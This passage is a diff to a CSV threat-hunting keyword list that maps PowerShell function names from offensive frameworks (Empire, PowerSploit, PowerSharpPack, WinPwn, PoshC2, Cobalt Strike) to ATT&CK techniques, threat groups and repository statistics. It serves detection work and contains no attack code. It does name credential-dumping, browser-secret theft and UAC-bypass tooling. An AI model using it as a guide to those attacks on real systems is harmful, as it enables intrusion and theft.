Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SensitiveHiveShadowCopyCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServiceAbuse*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-ServiceAbuse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ServiceAbuse*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Service-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-SessionGopher*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SessionGopher*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-ShadowSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*invoke-sharefinder *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ShadowSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-sharefinder *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*invokesharefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ShareFinder*","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-ShareFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-SharpAllowedToAct*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpBlock*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpBypassUAC*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpChromium*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpClipboard*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpCloud*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpCloud*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-Sharpcradle*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpDPAPI*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharPersist*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SharpGPO*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SharpGPOAbuse*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 